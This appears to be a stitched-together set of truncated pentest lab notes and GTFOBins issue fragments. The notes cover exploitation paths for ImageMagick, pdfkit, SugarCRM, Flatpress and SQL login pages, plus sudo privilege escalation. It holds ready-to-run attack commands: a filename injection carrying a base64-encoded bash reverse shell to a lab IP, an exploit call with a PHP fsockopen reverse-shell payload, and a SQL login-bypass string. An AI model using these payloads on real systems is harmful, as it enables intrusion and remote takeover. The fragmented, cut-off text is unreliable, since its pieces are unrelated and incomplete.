-
Key points:
- ImageMagick 6.9.6 exploit info to reverse shell
`cp image.jpg '|smile"echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE4Mi80NDQ0IDA+JjE=|base64 -d|bash".jpg'`
- strace (https://gt…
-
Key points:
- PDFKit exploit --> https://www.exploit-db.com/exploits/51293 (pdfkit v0.8.7.2 - Command Injection)
- [PE] ruby --> https://gtfobins.github.io/gtfobins/ruby/#sudo
-
Keypoints:
- Click send button in the contact form field --> Get CMS info --> find exploit info
[PE]
1. pspy64 ->
![image](https://github.com/user-attachments/assets/2f807e03-d4d4-4f85-b4e5-528e…
-
Keypoints:
- SugarCRM 7.12 --> CVE-2023-22952: https://github.com/manuelz120/CVE-2022-23940
` python3 exploit.py -h http://192.168.214.146 -u admin -p admin --payload "php -r '\$sock=fsockopen(\"19…
-
Hello, I would like to make a few contributions, but it's hard for me to determine if it truly falls under "Argument/Parameter injection". I get the concept but I'm not sure there is much distinction …
-
The GTFOBins project _[Get The F**k Out Binaries]_ lists binaries / commands / arguments which will allow for privilege escalation in a **Linux** environment:
[GTFOBins Project Page](https://gtfobin…
-
Keypoints:
- Flatpress 1.2.1 - File upload bypass to RCE Vulnerability
- [PE] [apt-get](https://gtfobins.github.io/gtfobins/apt-get/)
-
**Name the program name**
nc or netcat
**Describe the context of the usage**
Executing nc with the -l flag lets it listen on an arbitrary port and receive data. Older/traditional versions of nc us…
-
Keypoints:
- SQL login bypass `'OR '' = '` (https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Databases/MySQL-SQLi-Login-Bypass.fuzzdb.txt)
- Add public key into webpage --> then, SSH l…